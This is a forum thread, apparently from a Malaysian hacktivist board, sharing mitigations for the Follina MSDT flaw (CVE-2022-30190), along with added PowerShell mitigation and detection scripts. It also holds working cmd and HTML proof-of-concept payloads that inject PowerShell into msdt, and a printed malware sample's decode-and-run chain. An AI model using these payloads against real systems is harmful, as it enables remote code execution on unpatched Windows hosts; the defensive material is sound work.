
Alert: 0day CVE-2022-30190 Follina PoC and fix


impossible1337 (Warrant Officer II, DFM Member)
PoC / Patch / Fix: 0day CVE-2022-30190 Follina
by: impossible1337

Video: https://t.me/dragonforceio/740

#Fix 1: Workarounds
To disable the MSDT URL protocol
Payload key: ms-msdt:/id PCWDiagnostic
Payload key: msdt /id PCWDiagnostic

Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system.
Troubleshooters can still be accessed using the Get Help application and in System settings as other or additional troubleshooters.
Follow these steps to disable it:

1) Run Command Prompt as Administrator.
2) To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdtbak".
3) Execute the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".

How to undo the workaround

1) Run Command Prompt as Administrator.
2) To restore the registry key, execute the command "reg import ms-msdtbak".


#Fix 2
A Group Policy mitigation for the MSDT element, which is really good and easy to deploy:

0day CVE-2022-30190 "Troubleshooting wizards" by GPO

HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
Put simply:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics. Set "Troubleshooting: Allow users to access and run Troubleshooting Wizards" to "Disabled".
Windows 11 v21H2
Windows 10 v21H2
Windows 10 v21H1
Windows 10 v20H2
Windows 10 v2004
Windows 10 v1909
Windows 10 v1903
Windows 10 v1809
Windows 10 v1803
Windows 7
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019

PoC:
cmd:
msdt /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

html:
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";


Malware execution

The specific sample showed the following, which was hosted on the web server (xmlformats[.com]):

Code:
$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

MSDT: what is it?

MSDT is a diagnostic tooling set from Microsoft:

Answers questions about the MSDT – SQL Server | Microsoft Docs

msdt | Microsoft Docs

[MS-TPSOD]: Protocol Summary | Microsoft Docs

“Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.”

Official forum: https://dragonforce.io
Official radio: https://radio.dragonforce.io
Facebook: https://fb.me/dragonforcedotio
Telegram: https://t.me/dragonforceio
Twitter: https://twitter.com/dragonforceio
Youtube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw
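The two workarounds in the post above (export and delete the ms-msdt: handler; set ScriptedDiagnostics\EnableDiagnostics to 0) as a single audit / apply / rollback script. This is an added example and not code from the original post. It assumes an elevated PowerShell session on Windows; the backup path C:\msdt-backup\ms-msdt.reg is a placeholder, and -WhatIf previews the changes. Two caveats worth knowing: Fix 1 only removes the ms-msdt: URL route, which is how a document reaches msdt, so a direct msdt.exe command line like the cmd PoC above is not affected by it; and both fixes are stopgaps until the Microsoft update for CVE-2022-30190 (June 14, 2022) is installed, after which Rollback restores the handler.

```powershell
<#
Added example, not from the original post: audit / apply / roll back the two
Follina workarounds described above. Run from an elevated PowerShell session
on Windows. The backup path is a placeholder; -WhatIf previews the changes.
#>
[CmdletBinding(SupportsShouldProcess)]
param(
    [ValidateSet('Audit', 'Apply', 'Rollback')]
    [string]$Mode = 'Audit',
    [string]$BackupFile = 'C:\msdt-backup\ms-msdt.reg'   # placeholder location
)

$HandlerKey = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'                            # Fix 1: the ms-msdt: URL handler
$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics'  # Fix 2: value the GPO writes
$PolicyName = 'EnableDiagnostics'

function Get-FollinaMitigationState {
    # Reports both workarounds separately: Fix 1 only covers the URL route
    $handlerPresent = Test-Path -Path $HandlerKey
    $policyValue = (Get-ItemProperty -Path $PolicyKey -Name $PolicyName -ErrorAction SilentlyContinue).$PolicyName
    [pscustomobject]@{
        MsMsdtHandlerPresent    = $handlerPresent
        UrlRouteBlocked         = (-not $handlerPresent)
        TroubleshootersDisabled = ($policyValue -eq 0)
    }
}

switch ($Mode) {
    'Apply' {
        if (Test-Path -Path $HandlerKey) {
            # Export first (the manual "reg export" step) so the deletion can be undone
            New-Item -ItemType Directory -Path (Split-Path -Path $BackupFile) -Force | Out-Null
            reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $BackupFile /y | Out-Null
            if ($LASTEXITCODE -ne 0) { throw "reg export failed (exit $LASTEXITCODE); leaving handler in place" }
            if ($PSCmdlet.ShouldProcess($HandlerKey, 'Delete ms-msdt URL handler')) {
                Remove-Item -Path $HandlerKey -Recurse -Force
            }
        }
        if ($PSCmdlet.ShouldProcess($PolicyKey, "Set $PolicyName = 0")) {
            if (-not (Test-Path -Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
            New-ItemProperty -Path $PolicyKey -Name $PolicyName -PropertyType DWord -Value 0 -Force | Out-Null
        }
    }
    'Rollback' {
        # Only do this once the June 2022 update for CVE-2022-30190 is installed
        if (-not (Test-Path -Path $BackupFile)) { throw "No backup at $BackupFile; cannot restore the handler" }
        if ($PSCmdlet.ShouldProcess($BackupFile, 'Import ms-msdt handler backup')) {
            reg.exe import $BackupFile | Out-Null
            if ($LASTEXITCODE -ne 0) { throw "reg import failed (exit $LASTEXITCODE)" }
        }
        if ($PSCmdlet.ShouldProcess($PolicyKey, "Remove $PolicyName")) {
            Remove-ItemProperty -Path $PolicyKey -Name $PolicyName -ErrorAction SilentlyContinue
        }
    }
}

# Always finish by reporting the resulting state
Get-FollinaMitigationState
```

Run it as `.\Follina-Mitigation.ps1 -Mode Apply -WhatIf` first to see what would change; `-Mode Audit` (the default) is read-only and is the check to put in a fleet-wide compliance scan.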
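Detection logic for the indicators listed in the post above, as an added example that is not part of the original post. It scores process-creation records with Sysmon-style field names for (1) msdt.exe spawned by an Office process, (2) a PCWDiagnostic command line with a PowerShell $( ) sub-expression inside IT_BrowseForFile, which is the injection both PoC forms rely on, and (3) the second-stage chain from the xmlformats[.com] sample. The helper at the end shows why `findstr TVNDRgAAAA` is a usable signal: that string is the base64 encoding of MSCF followed by NUL bytes, the Microsoft Cabinet header, so the findstr/certutil/expand chain is carving a base64-embedded CAB out of the .rar carrier. The sample records and the carrier text are constructed for this example; the list of Office process names is an assumption.

```powershell
# Added example, not from the original post. Scores constructed process-creation
# records (Sysmon Event ID 1 style fields) for the Follina indicators, then shows
# what the sample's findstr/certutil/expand chain is doing.

function Test-FollinaIndicator {
    param([Parameter(Mandatory)][hashtable]$Event)

    $img    = [IO.Path]::GetFileName([string]$Event.Image)
    $parent = [IO.Path]::GetFileName([string]$Event.ParentImage)
    $cmd    = [string]$Event.CommandLine
    $hits   = New-Object System.Collections.Generic.List[string]

    # 1. msdt.exe launched by an Office app: a ms-msdt: link in a document lands here
    $office = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'   # assumed list
    if ($img -ieq 'msdt.exe' -and $office -contains $parent) {
        $hits.Add('msdt.exe spawned by an Office process')
    }
    # 2. PCWDiagnostic with a PowerShell sub-expression smuggled into IT_BrowseForFile
    #    (covers both the cmd form and the ms-msdt: URL form of the PoC)
    if ($cmd -match '(?i)(ms-msdt:|msdt(\.exe)?)\s*/id\s+PCWDiagnostic' -and
        $cmd -match '(?i)IT_BrowseForFile=\S*\$\(') {
        $hits.Add('PCWDiagnostic with $( ) injected into IT_BrowseForFile')
    }
    # 3. Second stage seen in the sample: kill msdt, then certutil-decode a marker line
    if ($cmd -match '(?i)taskkill\b.*\bmsdt\.exe' -or
        ($cmd -match '(?i)findstr\s+TVNDRgAAAA' -and $cmd -match '(?i)certutil\s+-decode')) {
        $hits.Add('post-exploitation staging chain')
    }

    $severity = if ($hits.Count -ge 2) { 'High' } elseif ($hits.Count -eq 1) { 'Medium' } else { 'None' }
    [pscustomobject]@{ Image = $img; Parent = $parent; Severity = $severity; Reasons = $hits.ToArray() }
}

# Constructed sample records (not real telemetry)
$samples = @(
    @{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       Image       = 'C:\Windows\System32\msdt.exe'
       CommandLine = 'C:\Windows\system32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_BrowseForFile=h$(Start-Process(''calc''))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"' }
    @{ ParentImage = 'C:\Windows\explorer.exe'
       Image       = 'C:\Windows\System32\msdt.exe'
       CommandLine = 'msdt.exe /id NetworkDiagnosticsWeb' }   # legitimate troubleshooter launch
    @{ ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       Image       = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe /c taskkill /f /im msdt.exe' }
)
$samples | ForEach-Object { Test-FollinaIndicator -Event $_ } | Format-Table -AutoSize
# Expected severities in order: High (two reasons), None, Medium

# Why "findstr TVNDRgAAAA" is a signal: it is the base64 of 'MSCF' + NUL bytes,
# the Microsoft Cabinet header, so the chain carves a base64-embedded CAB out of
# the .rar carrier and certutil/expand decode and unpack it.
$markerBytes = [Convert]::FromBase64String('TVNDRgAAAA==')
[Text.Encoding]::ASCII.GetString($markerBytes, 0, 4)            # MSCF

function Get-EmbeddedCab {
    # PowerShell equivalent of: findstr TVNDRgAAAA 1.rar > 1.t && certutil -decode 1.t 1.c
    param([string]$CarrierText, [string]$Marker = 'TVNDRgAAAA')
    $line = ($CarrierText -split "`n") | Where-Object { $_.Contains($Marker) } | Select-Object -First 1
    if (-not $line) { return $null }
    $bytes = [Convert]::FromBase64String($line.Trim())
    # Sanity check before anything like expand.exe touches it: CAB signature must be present
    if ([Text.Encoding]::ASCII.GetString($bytes, 0, 4) -ne 'MSCF') { throw 'decoded line is not a CAB' }
    return ,$bytes
}

# Constructed stand-in for 05-2022-0438.rar: junk lines plus one base64 line that
# carries only a CAB header (not a valid, unpackable CAB)
$cabStub = New-Object byte[] 32
[Text.Encoding]::ASCII.GetBytes('MSCF').CopyTo($cabStub, 0)
$carrier = @('Rar!', 'unrelated text', [Convert]::ToBase64String($cabStub), 'trailer') -join "`n"

$cab = Get-EmbeddedCab -CarrierText $carrier
'Recovered {0} bytes, signature {1}' -f $cab.Length, [Text.Encoding]::ASCII.GetString($cab, 0, 4)
```

Rule 2 is the one that survives renaming of the dropped binary or the hosting domain, because the $( ) sub-expression inside IT_BrowseForFile is what makes the PCWDiagnostic troubleshooter run attacker PowerShell; rule 1 and rule 3 are cheaper but depend on the delivery and staging details the sample happened to use.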
 

Soul_eater (Corporal, DragonForce Malaysia)
[Quoting impossible1337's post above]
Thanks, admin 👍
 

Aceofspade (Forum Etiquette & Moderation, DragonForce Malaysia)
[Quoting impossible1337's post above]
Great share, admin!!
 

impossible1337 (Warrant Officer II, DFM Member)
A Group Policy mitigation for the MSDT element, which is really good and easy to deploy:

0day CVE-2022-30190 "Troubleshooting wizards" by GPO

HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
Put simply:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics. Set "Troubleshooting: Allow users to access and run Troubleshooting Wizards" to "Disabled".

 

L4Nr4z89 (Warrant Officer II, DFM Member)
[Quoting impossible1337's post above]
Wa alaikum salam. Great, admin!! Thanks for sharing the info. 👍🤨
 

Jaring (Offensive Moderation, DragonForce Malaysia)
[Quoting impossible1337's post above]
Thanks for sharing, admin 🤠
 